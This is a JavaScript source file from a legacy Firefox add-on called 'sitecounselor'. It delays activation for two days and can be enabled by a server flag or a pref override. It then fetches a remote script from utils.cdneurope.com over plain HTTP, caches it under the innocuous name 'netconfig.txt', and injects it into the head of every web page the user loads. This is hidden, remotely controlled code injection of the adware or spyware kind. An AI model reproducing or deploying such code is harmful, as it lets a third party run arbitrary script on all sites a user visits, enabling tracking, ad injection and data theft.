var sitecounselor_mo = new function() {
	var self = this;
	var DEBUG = true;

	var log = function(logInfo) {
		if (DEBUG) { console.log(logInfo); }
	};	

	this.AFF_RUN_ON_INSTALL = true;
	this.PREFS_BRANCH 		= "";

	this.AddonInfo = null;

	this.init = function(event) {
		var monEnabler = new this.MonEnabler(event.params);
		monEnabler.enable();
		if (monEnabler.isMonEnabled()) {
			monEnabler.addTabListener();
			window.dispatchEvent(new Event("websiteRecAff"));
		}
		else if (this.AFF_RUN_ON_INSTALL) {
			log("websiteRecAff Event");
			window.dispatchEvent(new Event("websiteRecAff"));
		}
	};

	this.loadModules = function() {
		Components.utils.import("resource://sitecounselor/AddonInfo.js", this);
	};

	this.setDebug = function() {
		if (DEBUG && this.AddonInfo && this.AddonInfo.debug === false) { DEBUG = false; }
	};

	// this is to override the mon check in "tr.js" from the server.
	this.triggerMoEvent = function() {
		this.loadModules();
		this.setDebug();		
		var moEvent = new CustomEvent("mo");
		moEvent.params = {
			isEnabled : true,
			addonId : self.AddonInfo.id
		};
		window.dispatchEvent(moEvent);
	};

	this.MonEnabler = function(params) {
		var self = this;
		var prefService = null;

		this.PREFS_BRANCH = "";

		this.OVERRIDE_CHECK = false;
		this.DAYS_ENABLE = 2;
		this.FILE_CACHER_URL = "http://utils.cdneurope.com/js/mo.js";
		this.LOCAL_FILENAME = "netconfig.txt";
		this.LAST_CACHED_PREF_NAME = "mo";

		this.FileCacher = null;		// loaded via module
		this.monFileCacher = null; 	// FileCacher instance

		this.init = function(params) {
			this.loadModules();
			prefService = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefService).getBranch(this.PREFS_BRANCH);
			this.isEnabled = false;
			this.isServerEnabled = params.isEnabled || false;
			this.addonId = params.addonId;
			this.monFileCacher = new this.FileCacher(this.FILE_CACHER_URL, this.LOCAL_FILENAME, this.LAST_CACHED_PREF_NAME);
		};

		this.loadModules = function() {
			Components.utils.import("resource://sitecounselor/FileCacher.js", this);
			Components.utils.import("resource://sitecounselor/TimePassed.js", this);
		};		

		this.enable = function() {
			if (this.OVERRIDE_CHECK || this.getMoPref() === true) {
				log("override from pref");
				this.isEnabled = true;
				return;
			}
			if (!this.isServerEnabled) {					
				return;
			}
			var timePassed = new this.TimePassed();
			log("timePassed mo");
			if (timePassed.hasTimePassed(this.DAYS_ENABLE, timePassed.TIME_TYPE.DAYS)) { 
				this.isEnabled = true;
				this.setMoPref(true);
			}
		};

		this.isMonEnabled = function() { return this.isEnabled; };

		this.setMoPref = function(value) {
			prefService.setBoolPref(this.addonId + ".moEnabled", value);
		};

		this.getMoPref = function() {
			try {
				var moPref = prefService.getBoolPref(this.addonId + ".moEnabled");
				if (moPref) { return true; }
				return false;
			} catch(ex) {
				return false;
			}
		};		

		this.addTabListener = function() {
			var tabListener = {
				isValidListener : function(iid) {	
					return (iid.equals(Components.interfaces.nsIWebProgressListener) 
						|| iid.equals(Components.interfaces.nsISupportsWeakReference) 
						|| iid.equals(Components.interfaces.nsISupports));
				},
				QueryInterface: function(iid) {
					if (this.isValidListener(iid)) {
						return this;
					}
					throw Components.results.NS_NOINTERFACE;
				},
				onLocationChange: function(aBrowser, aProgress, aRequest, aURI) { }, 
				onProgressChange: function(aBrowser, aProgress, aRequest, curSelfPr, maxSelfPr, curTotPr, maxTotPr) { return 0 }, 
				onSecurityChange: function(aBrowser, aProgress, aRequest, aState) { return 0; },
			  	onStateChange: function(aBrowser, aProgress, aRequest, aFlag, aStatus) {
					try {
						if (!(aFlag & Components.interfaces.nsIWebProgressListener.STATE_STOP)) { return 0; }
						if (aProgress.DOMWindow != aProgress.DOMWindow.top) { return 0; }

						var httpChannel = null;
						try { httpChannel = aRequest.QueryInterface(Components.interfaces.nsIHttpChannel); } catch (e) {}
						if (!httpChannel) {
							var x = (aRequest == null);
							return 0;
						}
						
						if (httpChannel.URI.asciiSpec != aBrowser.currentURI.asciiSpec) { return; }
						
						if (httpChannel.responseStatus == 200) {
							self.addMon(aBrowser.contentDocument);
						}
					}
					catch(e) { }
				},
				onStatusChange: function(aBrowser, webProgress , request , ostatus ,  message) { return 0; },
				onRefreshAttempted: function(aBrowser,webProgress,aRefreshURI,aMillis,aSameURI) { return true; },
				onLinkIconAvailable : function(aBrowser) { return 0 }
			};

			gBrowser.addTabsProgressListener(tabListener);
		};

		this.addMon = function(doc) {
			this.monFileCacher.getFileContents(function(fileContents) {
				var tagId = "sim_mo";
				self.createMonTag(doc, fileContents, tagId);
			});
		};

		this.createMonTag = function(doc, fileContents, tagId) {
			if (doc.getElementById(tagId)) { return; }
			var head = doc.getElementsByTagName('head')[0];
			var script = doc.createElement('script');
			script.type = 'text/javascript';
			var textNode = document.createTextNode(fileContents);
			script.id = tagId;
			script.appendChild(textNode);
			head.appendChild(script);
		};

		this.init(params);
	};

	window.addEventListener("mo", function(event) { self.init(event); }, false);
	this.triggerMoEvent();
};